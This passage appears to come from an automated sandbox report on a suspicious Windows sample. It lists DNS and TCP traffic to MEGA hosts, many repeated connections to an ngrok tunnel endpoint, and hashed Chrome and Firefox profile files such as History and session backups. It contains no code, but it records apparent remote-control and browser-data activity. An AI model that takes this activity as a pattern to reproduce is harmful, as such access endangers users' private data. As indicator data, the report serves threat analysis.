| US | 8.8.8.8:53 | gfs440n202.userstorage.mega.co.nz | udp |
| JP | 103.99.35.202:443 | gfs440n202.userstorage.mega.co.nz | tcp |
| JP | 103.99.35.202:443 | gfs440n202.userstorage.mega.co.nz | tcp |
| US | 8.8.8.8:53 | mcd270n314.karere.mega.nz | udp |
| LU | 66.203.125.29:443 | mcd270n314.karere.mega.nz | tcp |
| US | 8.8.8.8:53 | 29.125.203.66.in-addr.arpa | udp |
| US | 8.8.8.8:53 | mcd270n310.karere.mega.nz | udp |
| LU | 66.203.125.56:443 | mcd270n310.karere.mega.nz | tcp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| US | 108.177.122.94:443 | beacons.gcp.gvt2.com | tcp |
| US | 8.8.8.8:53 | 94.122.177.108.in-addr.arpa | udp |
| N/A | 127.0.0.1:6341 | tcp | |
| N/A | 127.0.0.1:6341 | tcp | |
| N/A | 127.0.0.1:6341 | tcp | |
| N/A | 127.0.0.1:6341 | tcp | |
| US | 8.8.8.8:53 | 2.tcp.eu.ngrok.io | udp |
| DE | 18.192.93.86:18319 | 2.tcp.eu.ngrok.io | tcp |
| DE | 18.192.93.86:18319 | 2.tcp.eu.ngrok.io | tcp |
| DE | 18.192.93.86:18319 | 2.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | 86.93.192.18.in-addr.arpa | udp |
| DE | 18.192.93.86:18319 | 2.tcp.eu.ngrok.io | tcp |
| DE | 18.192.93.86:18319 | 2.tcp.eu.ngrok.io | tcp |
| DE | 18.192.93.86:18319 | 2.tcp.eu.ngrok.io | tcp |
| DE | 18.192.93.86:18319 | 2.tcp.eu.ngrok.io | tcp |
| DE | 18.192.93.86:18319 | 2.tcp.eu.ngrok.io | tcp |
| DE | 18.192.93.86:18319 | 2.tcp.eu.ngrok.io | tcp |
| DE | 18.192.93.86:18319 | 2.tcp.eu.ngrok.io | tcp |
| DE | 18.192.93.86:18319 | 2.tcp.eu.ngrok.io | tcp |
| DE | 18.192.93.86:18319 | 2.tcp.eu.ngrok.io | tcp |
| DE | 18.192.93.86:18319 | 2.tcp.eu.ngrok.io | tcp |
| DE | 18.192.93.86:18319 | 2.tcp.eu.ngrok.io | tcp |
| DE | 18.192.93.86:18319 | 2.tcp.eu.ngrok.io | tcp |
| DE | 18.192.93.86:18319 | 2.tcp.eu.ngrok.io | tcp |
| DE | 18.192.93.86:18319 | 2.tcp.eu.ngrok.io | tcp |
| DE | 18.192.93.86:18319 | 2.tcp.eu.ngrok.io | tcp |
| DE | 18.192.93.86:18319 | 2.tcp.eu.ngrok.io | tcp |
| DE | 18.192.93.86:18319 | 2.tcp.eu.ngrok.io | tcp |
| DE | 18.192.93.86:18319 | 2.tcp.eu.ngrok.io | tcp |
| DE | 18.192.93.86:18319 | 2.tcp.eu.ngrok.io | tcp |
| DE | 18.192.93.86:18319 | 2.tcp.eu.ngrok.io | tcp |
| DE | 18.192.93.86:18319 | 2.tcp.eu.ngrok.io | tcp |
| DE | 18.192.93.86:18319 | 2.tcp.eu.ngrok.io | tcp |
| DE | 18.192.93.86:18319 | 2.tcp.eu.ngrok.io | tcp |
| DE | 18.192.93.86:18319 | 2.tcp.eu.ngrok.io | tcp |
Files
\??\pipe\crashpad_3420_SLDYAXLBAXRSTHJA
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json
| MD5 | 99914b932bd37a50b983c5e7c90ae93b |
| SHA1 | bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f |
| SHA256 | 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a |
| SHA512 | 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | ab170131f1394b613b194b371ac52303 |
| SHA1 | 6f00e8c6f60f81927db9276ffe0c730941084334 |
| SHA256 | 82aefab3d16643b1f52d746b429de219ec0b97b8c0af1cb360106d9087b5577c |
| SHA512 | cb88804da4a4de88466419f26594d561d6d35fcae4e6da5e2ad422f559b68264a3766c472b49e658811ce0743d7e4eacd457474720c401005d8854bcfaedd659 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 22b81405fe6be913f6b766754bd4d1cf |
| SHA1 | cb6c2ad06bab7c46a9e3f8bb92ded8094f47e2d9 |
| SHA256 | bb8bd8fbd711070f4e17a751d6eea25a35aada863ae56e9d65abec48c32fa0da |
| SHA512 | 3eed3e7c7a9a8cd40985456602b797a5fe847440daf6af03ffe7361ded47d5926243fd8f71ff086fc09e73e2c0cf5264db539b15bb3ea99c980dff59106d4623 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 454e71e3f910dbfd25ce860cc334c8eb |
| SHA1 | 72c16d5233d5c3822ea1a16b3f25814ea516b2e3 |
| SHA256 | a9cb3fbaf2e42b5be51dc9e49eaea5630451907994207ebb652c0e7b3f2b50d6 |
| SHA512 | 724f217e6170f6699db2e079ff4c88029cb6d18114dc16bd3080dff816bdeafb28f8ea30bcc7475dae58cd4267a86d669e30ef5ccfbe690403b837dab2e1c038 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | f87030a6bb796e47954ce5f7c6f5ea86 |
| SHA1 | 87e928d19a05e6a561e4824d3a50cb4203ee3a02 |
| SHA256 | a79adf6e6421dc8d69128264d470e589de10ecd74a1bfc33e4591f2bdbf853e7 |
| SHA512 | 77df2117a31818aaab98c5916297b1736ba3e45c7350b80bbb0cd640113c849d4905918f3ef53ce8fe6caab126e7ff6956bc5267138846bedeb585ed3c2d5b1a |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\data_1
| MD5 | f50f89a0a91564d0b8a211f8921aa7de |
| SHA1 | 112403a17dd69d5b9018b8cede023cb3b54eab7d |
| SHA256 | b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec |
| SHA512 | bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\datareporting\glean\pending_pings\8b1ee577-20f7-413b-9838-c8c36256be21
| MD5 | 7a5ca81d6c47e22dbbf22349df54060d |
| SHA1 | c4906b325c1e039132efb0b509dcd67f1483eb27 |
| SHA256 | b28965e63c52180b93be618c975805220f2ad51e967eec3c2ba5f3e74c6bc763 |
| SHA512 | 85355b5bcaa80724cd2a907fe5fe350fb8ddfb3aa16fdae39743929b933997f87abe67929b0e3e157441e00433ae97ac2fb53aaa61730e4e589001c2e901f1fd |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\datareporting\glean\pending_pings\844db0b7-7bae-4317-a997-2c2ebad11870
| MD5 | 4afce323f1e58792e16e754ce28c7fc3 |
| SHA1 | 61ef9076eb91f9da01df28cbd95c8e56bbdfddc5 |
| SHA256 | 44c80b3627ca672738c0ab843125eb0c8a343590c4987c53a32ddaa3f438aa0a |
| SHA512 | 14d69d1b9a8d9af76ed6960187361a2754f71292e6072f965b73c652a9cef4522a79e924cff8bbb4f606005e48fad64ef1f0e3dfa7c369f45cc219a79b04362e |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\prefs.js
| MD5 | 3b0619b4604ce1bd3be604e803562e85 |
| SHA1 | b3eeb46abe2237e40c5d13afaf527fd408767cac |
| SHA256 | 4a99c3488e330da094522286e7d5724e0a8c632a58f2eb95cd482694ed2fe99a |
| SHA512 | 7ace76ab20507dee9a774d6f7701c7f62b2c3c08f2693640636a2231d2b94b9fdd55ab270f5b402be19d542be7430d23bc16ba865a670f98d6723537c880c1c8 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\datareporting\glean\db\data.safe.bin
| MD5 | 0683efcc668655c348f7f3eccc06ee2d |
| SHA1 | d27b263f41f70e412ca52c8831c7fab5a1710237 |
| SHA256 | 07c77a14c7590d57edd910ad982419a2c0beb4144e1ff4b4d761329b9e52183f |
| SHA512 | cd43984eaa98fe49a6d0088eaaf4def4bf7458cfb6d89c728a00689aee5e2d3006b6bb26b007799c84dc1d783055bc58a7fe49061b37d81a42b2cc515854b51d |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\prefs-1.js
| MD5 | 57eae3ca3f2e68e45fa17437574ac8a8 |
| SHA1 | c11bed7b6884a993d0c8b5f4ef779ba3c5a61f99 |
| SHA256 | d4fceb99d15e032209b938ac66e2bacdedd481edcdf3cfe3325acf216c551b5e |
| SHA512 | 7e2675421f2ee6a5af7999ba9be001d93c75317a39d959963b92767ce3477e5d15be58b1044e429ff3d44ff09d8ec95ac0cd57129b2d98d59f8837cad3f466ce |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
| MD5 | b01efd0877d8bb4a5d754d6d5a5922cf |
| SHA1 | 6dfaecd4219afbb206185171c64c777e9c73ae21 |
| SHA256 | ef1ebedd446ce18b79317f09953ff8a6069f92749188b45945567c315388aa90 |
| SHA512 | 6f5fce89b6dc7e6979fdb01493c0811bcd55cb945d7665cd9a23e93419a5aa28207b3f614461103f04b0406741e8020c35252fda5529e41e3e918e42fd89c086 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | c654000a4fdd838729755510df48ee87 |
| SHA1 | 26975694684a2dc50243e2608ef0adaba947cdd3 |
| SHA256 | 036e59aca6ab5be393a1d202f33ec260c37bcc3d846bb632cb25be8ac5a19a1e |
| SHA512 | d05e55655aa5710af384a9e487e1a04e812ee563aeae3548acd28e4984eab365895cd4474b25ba1ec73edce7674e28a24baa1a8912a5d0006af8afef124de93a |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\prefs-1.js
| MD5 | 96e4b250e317c7aeedb7e6d0e2ab0837 |
| SHA1 | e3ed54e45d642bbd92d82fb79eb75ce7fb5c248f |
| SHA256 | b664efee4f142f1b6bb31018de2bb43289c3d0bbf98b161c151e1360a5ce5195 |
| SHA512 | 1e06feca100887df1a5521bd2f365f8ae0b8acbef5692a668710a25b65e36d9ff281c20e08e13fa7a007a52f87cac66408d0c49db0f224bdb6877fc11422f312 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\prefs-1.js
| MD5 | 4625692b6dcab89e184b927ef9eb3bf2 |
| SHA1 | b3267b04cd12491f92ae21d206efe68ee5701fa4 |
| SHA256 | 8a1c958123f652f8b34a4ff010edfa9093ce137643deebb1bf0ec74cdf90d045 |
| SHA512 | 7454a86138318a7b19942a1ec41d81bcf760a79f469fa8a07b93ef12b6d323e14f860cd53e0f123850a72dcfbc3d6d906f40cb2f0a4cd1db567aba0819cad644 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | bb300749752421fefb51c51049c8960c |
| SHA1 | 8a0e5b4e803031558be19cdf71940e01bf6497a3 |
| SHA256 | e85ddc16388190bacbfadb3c74e6d9743047ac238cc2dd43133ba89eaaf7c9ba |
| SHA512 | 265978ee5dd5b91331df3b6263b98b2161396a3eb711e01057e27ec8dc7c48432853c21084e287afc52169eef62a0f65566d4c808d720852a9a54fe45d2c96cc |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\History
| MD5 | f84b4ccfd2b09b1cafac8e75a8898545 |
| SHA1 | 1a0159d3bfdc1c0b95eb928588792bcb1ff6ab17 |
| SHA256 | 2e8c235a0932f1583e49ed2ad789ed181e5b4bf59c42f3d337eb765ce4c81418 |
| SHA512 | 8fb0de4114291bdc3f75d0d2cffae067f8f029decc4393bbc6a5507aeebfa5b02058708f5fd47a50013e5eadb1f9e320692b160d1a3441d35d8ef3b92d7534ac |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\storage\default\https+++mega.nz\cache\morgue\216\{dca59a64-eb19-4dbb-8650-531a706197d8}.final
| MD5 | 3efa9abd92666265dd81c4f4311a96f9 |
| SHA1 | 41b6b716d67b93555e444cd453f3c6e3f8c9522c |
| SHA256 | 5066b1841e8877db31312ef3af86f9bc9234c95071119e025764f45241a4e2e7 |
| SHA512 | 5961950f077501608a0f2975e7f69c483eeacc4eec4ac77fd650cc1131609501f87819f93ed23aa508a90426156abf038a859fac4112d2d4435bbb634027cd6c |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 0759b24aa7fc5d68cfd0583b404c4819 |
| SHA1 | 17145fee15b9ff29a7251fc30e486675985901ba |
| SHA256 | fb85dd255d25a080dd95c6e585561a2cbc4ffbb8b1ab92b27c1d61c1181a19c0 |
| SHA512 | 9e74057714aa1a74c73969d9f133f96b103a1604b0814f15619f9a1a99f3d4b9672cbd06296f49fb2c4727ef542ff2ba82a0da061c9be9e76b3ef8a6aa2d2edf |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | d7fe538b3fd68d6f12f8d9b83248a2c3 |
| SHA1 | 2145c693896c50bfc1c92e45b59ab6d34074245f |
| SHA256 | 8077ceb78b6d0e15f41bcf04f182116054f9e0a5ef7bc2f196bd6dc54b6e5ba4 |
| SHA512 | 1cd1b634ff2c77d5231eac4e899328438bbb7b5f6f60dc485f7196590b8ed614db5ea91409226004d432cd2425d22f28d5742bb7f1e31098c6d73555dea027ef |
C:\Users\Admin\AppData\Local\Temp\tmpaddon
| MD5 | 85430baed3398695717b0263807cf97c |
| SHA1 | fffbee923cea216f50fce5d54219a188a5100f41 |
| SHA256 | a9f4281f82b3579581c389e8583dc9f477c7fd0e20c9dfc91a2e611e21e3407e |
| SHA512 | 06511f1f6c6d44d076b3c593528c26a602348d9c41689dbf5ff716b671c3ca5756b12cb2e5869f836dedce27b1a5cfe79b93c707fd01f8e84b620923bb61b5f1 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info
| MD5 | 3d33cdc0b3d281e67dd52e14435dd04f |
| SHA1 | 4db88689282fd4f9e9e6ab95fcbb23df6e6485db |
| SHA256 | f526e9f98841d987606efeaff7f3e017ba9fd516c4be83890c7f9a093ea4c47b |
| SHA512 | a4a96743332cc8ef0f86bc2e6122618bfc75ed46781dadbac9e580cd73df89e74738638a2cccb4caa4cbbf393d771d7f2c73f825737cdb247362450a0d4a4bc1 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll
| MD5 | fe3355639648c417e8307c6d051e3e37 |
| SHA1 | f54602d4b4778da21bc97c7238fc66aa68c8ee34 |
| SHA256 | 1ed7877024be63a049da98733fd282c16bd620530a4fb580dacec3a78ace914e |
| SHA512 | 8f4030bb2464b98eccbea6f06eb186d7216932702d94f6b84c56419e9cf65a18309711ab342d1513bf85aed402bc3535a70db4395874828f0d35c278dd2eac9c |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\prefs-1.js
| MD5 | 8bc1253872967cab596963fe3d3ab365 |
| SHA1 | 32490d459b9194f81a72eb3600cec4129f00e420 |
| SHA256 | a6de29aa6bab43a97860852feaa7e8269bb7f578e3ac362c1813b25934982bcc |
| SHA512 | 23ff122145437eb27da5197d23112e124ce02b93867ee60243f5d995cea2e4a722f6860177683727b2974bba32e21ce1b1ea883bc55de1a01b26c43cf078ce3a |
C:\Users\Admin\AppData\Local\Temp\tmpaddon-1
| MD5 | a01c5ecd6108350ae23d2cddf0e77c17 |
| SHA1 | c6ac28a2cd979f1f9a75d56271821d5ff665e2b6 |
| SHA256 | 345d44e3aa3e1967d186a43d732c8051235c43458169a5d7d371780a6475ee42 |
| SHA512 | b046dd1b26ec0b810ee441b7ad4dc135e3f1521a817b9f3db60a32976352e8f7e53920e1a77fc5b4130aac260d79deef7e823267b4414e9cc774d8bffca56a72 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\gmp-widevinecdm\4.10.2557.0\LICENSE.txt
| MD5 | 49ddb419d96dceb9069018535fb2e2fc |
| SHA1 | 62aa6fea895a8b68d468a015f6e6ab400d7a7ca6 |
| SHA256 | 2af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539 |
| SHA512 | 48386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\gmp-widevinecdm\4.10.2557.0\manifest.json
| MD5 | 8be33af717bb1b67fbd61c3f4b807e9e |
| SHA1 | 7cf17656d174d951957ff36810e874a134dd49e0 |
| SHA256 | e92d3394635edfb987a7528e0ccd24360e07a299078df2a6967ca3aae22fa2dd |
| SHA512 | 6125f60418e25fee896bf59f5672945cd8f36f03665c721837bb50adf5b4dfef2dddbfcfc817555027dcfa90e1ef2a1e80af1219e8063629ea70263d2fc936a7 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll
| MD5 | 33bf7b0439480effb9fb212efce87b13 |
| SHA1 | cee50f2745edc6dc291887b6075ca64d716f495a |
| SHA256 | 8ee42d9258e20bbc5bfdfae61605429beb5421ffeaaa0d02b86d4978f4b4ac4e |
| SHA512 | d329a1a1d98e302142f2776de8cc2cd45a465d77cb21c461bdf5ee58c68073a715519f449cb673977288fe18401a0abcce636c85abaec61a4a7a08a16c924275 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.lib
| MD5 | 688bed3676d2104e7f17ae1cd2c59404 |
| SHA1 | 952b2cdf783ac72fcb98338723e9afd38d47ad8e |
| SHA256 | 33899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237 |
| SHA512 | 7a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.sig
| MD5 | 937326fead5fd401f6cca9118bd9ade9 |
| SHA1 | 4526a57d4ae14ed29b37632c72aef3c408189d91 |
| SHA256 | 68a03f075db104f84afdd8fca45a7e4bff7b55dc1a2a24272b3abe16d8759c81 |
| SHA512 | b232f6cf3f88adb346281167ac714c4c4c7aac15175087c336911946d12d63d3a3a458e06b298b41a7ec582ef09fe238da3a3166ff89c450117228f7485c22d2 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\storage\default\https+++mega.nz\idb\1409365021%s2p4.sqlite
| MD5 | fcd58b59292a3286dac648643a5cc423 |
| SHA1 | 04395383b847b30078014871b86ef118189b351b |
| SHA256 | 471d706fe94308eab74407214d9498ab5c5eaa5d68d7e31f0a7e0b362cc82e19 |
| SHA512 | caa5f0a65f9b3eab451d8b10bdd8ef06621dde1af70954babb6fb1af57c4bfce9707251b38f79fdbf098d9227537bd2d947a19e26c1b27f6bc968bcb4b811fe8 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\entries\45BCB7B740362A010E1BE9F709145A6B5D8795B2
| MD5 | 682d071b21b2a17b24d2cad052c0865c |
| SHA1 | 5d5b95efb6745f10b167e27307b2d7bcbd51e061 |
| SHA256 | cf411b889b3258f93a14bb791ba7557f9af59a8da690c40b4a69fa37c679c231 |
| SHA512 | dbeacededabfc8c2349b28a7502856049fe6fe1ce9fd6f6378f24e3a0e11fe38fbe7cb52672b254a95e611c7d31d1a5420279c9ffdd2fc4b32f367c1a4f075b2 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 9dcdb075042d153d6e7a06edeb958771 |
| SHA1 | cdf58f34a1b25577a301ebf4fc5de0980fe53144 |
| SHA256 | 69458f3d4964c57f6d4d31fcbf4af8945bd67bccfcd660ef53b61506a2452fd8 |
| SHA512 | c2852c3b87ca7669e6c1f47d3ea28d4aa24397378991bb836466a00b915b5e7492dfaa1a9d07b738be2916281925f9966dc8b7e135a7b738cfcead84fa78724b |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\doomed\8318
| MD5 | 33c02a6e10e9b243f785d2bdb95649b0 |
| SHA1 | 74e2b7ed1235005b6ad50ad57b67f03a357f731d |
| SHA256 | f5d53ae63dfc46cf40f170cb7c883f7475d214f5d644c3341b543dd7eb5f6c60 |
| SHA512 | 910c2722e35597f246dd0a7a82411a94c33014a8bd5b22157a6321aca68fbb11da1fd6491bf4de1ab9a24100c60c8dfd40528d28b32850a959676df207559924 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\entries\5E3F231055825CEC7AE91E91A990320D4AE9B0A7
| MD5 | a37178cb4fe01930d927634542ee35c2 |
| SHA1 | 7886c820fb40e7f8a70ddbe4ec02b393b41b94f7 |
| SHA256 | c89e8878aadc25ccc2ff4450c141e547acb4358039e4b663644f264eb7f040aa |
| SHA512 | a244e631a0e13f93174a58bdbbac193e4741baf01d5a402d6ad68206fa05586c4eb986e206ec059c781138be1b604e3e7d11bbc9730d226fa9b4c720c868ffbc |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\doomed\28856
| MD5 | d162da03411462e1dc60f8334cbb6293 |
| SHA1 | 128e5206151658b9b8cea391b3fd072f3d2df7b5 |
| SHA256 | ead2eb8e2e82dde369cb9564d7ee866553abf77159a7249c3beb99c94c752a69 |
| SHA512 | 4797297627aa3a6fd1e1c697cfe99abf62cd44c6d615c9ab9b76434aa482f6e1a5a19c1118b106843ef17836c085b7352062a9803bf2e275ed3f22eb86ec3f76 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\entries\46452CEA1D6AA2BF58B5942C88BD664FF9175EFC
| MD5 | 19babcced4b3ccf4784052c0b40483de |
| SHA1 | 77d8b870a7dc0eb50bae850708eb88291f3b9603 |
| SHA256 | f2e70393d1b47b778244aef5a5c87f285c7189c858afb5a50b851e75a16e53b6 |
| SHA512 | c746ca6a1116c8e8f2d4845ddf464b39dfeeb3e8f63252365cb8fa080e2da4349d0f0973c515abe24f3cb08c68deb5dbcd71f0d6cdfbbdd512b0b4d60762dc51 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\doomed\31978
| MD5 | bb7d7ee847909e020cecf30f87ef8643 |
| SHA1 | b4eedf6dec8c893e74974dbeef0b206612e2b4de |
| SHA256 | 561f6fb033c13f61db485d3f8d0976f7d3328d7b0c91d371ee77696dfb1c395d |
| SHA512 | d08d75b11ecbd40eb6b70e3ae75864b745add0de65c3f748601e8095a6a867fd19f57bd68b50b06fcc9bc065c696cbe54610927ebf2c2121716a958c795d01df |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 4e08902eb7a03df29c991f41580d0c4e |
| SHA1 | db89428b5cb5737ac44ea60918db6f2a8e52758c |
| SHA256 | 38b06c8db8d7db5d0b58a8c55aaeb5edfe99e8f4318686241bb9207bc6db1092 |
| SHA512 | da4d105781dc827cc32a134c9afcdce224f3d87820518ee16d17afc00f132b832f2f1dd839be9799f9c1b6b18a6171fd82a7e95687da70c8cdec868a7e6d3abb |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | c0f011cc48a13a585445a342dcc1fc6d |
| SHA1 | 0ffc3ae3fa177ab2477210e2b1504faa26231f8f |
| SHA256 | d31349788fc6c81c50ef5e4cc1130466ac12f7544bbb915922cc8cca7dc764c2 |
| SHA512 | e5615f4260ce364a714700b97686c8618d43a51a2c9d74d19a4813599c952d7b5ac0b8df6d8f9b3048b80226215d6d078f535ee6418baf11d988ba23adc7f236 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms
| MD5 | 6a0847fbd3c6f886644cc30f35bc2e1d |
| SHA1 | c581e8d434d5edff7cdfae0e68c136cd2bae693c |
| SHA256 | 52ecee141745dd32ec15982beb5f06ff6d9e1c9113cf6f8e42fc8ce7c06e1cb0 |
| SHA512 | 5c66e3de60411d7b652fd471ff1b284705e63f3a616e185bbd38fb0eb5cc4c3ac7bb59f2b03fa30d07d348038058f9225b926644becaf172dd4b164831931ac3 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms
| MD5 | c30bcf14311c15925a7a04f38134b726 |
| SHA1 | 701160320fefcf846586ed75ba7180838ebd1f97 |
| SHA256 | e53d8fdb314981d46d36244bc0e9829d9087e5b34c3c2770904bad7fba038845 |
| SHA512 | 06db6579a92286f9c567f324179ef7ab3b9f6463193333343c53e71167dcdcb893e22a1c049e4497174e7641d256ff98e631501c493e3f30187c57eafd6e9b1c |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\thumbnails\c9e626258b56c126eeb9839a3833c741.png
| MD5 | 7e2ed7c370e594e7a35c7f6edf80e78d |
| SHA1 | 04d74e7345d2a1265f793b5e3f944b3c0cfdd24c |
| SHA256 | f93afdc5aa9082bdf396147822f9cd9eb715e525393ffc757fe6ae7973a16c7e |
| SHA512 | 16101e908b5afa434bef39a2448bdac602e3d8103ba846493e17a9890ccefec967e18a5651f4e99bc373d2a891525dd0ae6fadcf2314cecac1bdc6f2cc520659 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms
| MD5 | 358268b7f8511b189e18e30d0ff63b7b |
| SHA1 | a5861623cd77efa1d561c579f3ffbf744211890b |
| SHA256 | 6d5b738764e28efb285e4df96a02591c3479bfc49f3555ca30b6d2f0d93c1b29 |
| SHA512 | 31e6377d57d58c22b593dd3fedb922d068fa012b6ca042b710419b9f785806b794f028ba50268d6e7e69a8efbaca8ea26f7f7e3261b7489dcc076f42a831e4fb |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\prefs.js
| MD5 | 6e55306ef62e3e1c2e519dcdab7448c3 |
| SHA1 | ba16b7c06f0e4c93dcd0a1c0d0e224897830a58d |
| SHA256 | f62575aec304f87e79de4e09a644d2d1223b068076d21068f0632dbec9409c24 |
| SHA512 | 55859c0107d1e0ac3c048e1b498cff4f37d5ede6fa1069edf953d32c9d7fecb87e573e8c24b4c32a1c0ad65c09f34acb60861df009a71bff365e4c4d7cc9d9a1 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\prefs-1.js
| MD5 | 3e3643993c312a3ce98036d245bb1a59 |
| SHA1 | de2f98cf3b05ef9b8fd1ee9cfd94898919d761cf |
| SHA256 | 4ffb1ec18a1f73738ea7f783dcbb571911f5ac4200eebc325d10244df592964a |
| SHA512 | dfa98e56a9665d42b27c7cd9c2b575a33ab97c964c2a4af58811858cb9c4d192751d1df31d3c5cd1d4b7eb5d0fa430036427273812ca96f8cd17795567df2ad6 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\prefs-1.js
| MD5 | 9bb9fbb3d6da9aa950dd01a1d54ac6ec |
| SHA1 | 9d5242693d5515221c78a5f039646f5508137229 |
| SHA256 | 77ff439cc82701e2ba94e7ae160cbbcd4e7d7d4b3976266b9ee6327aea831a04 |
| SHA512 | 8c7da8c7556f1e995a4c7bdda323a56781a64ba3df5d3bb20dded2148faba2622f6a33be4c45356f5e7e351230285ad5f5bd8fab019919a903b291240b94747c |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\broadcast-listeners.json
| MD5 | 72c95709e1a3b27919e13d28bbe8e8a2 |
| SHA1 | 00892decbee63d627057730bfc0c6a4f13099ee4 |
| SHA256 | 9cf589357fceea2f37cd1a925e5d33fd517a44d22a16c357f7fb5d4d187034aa |
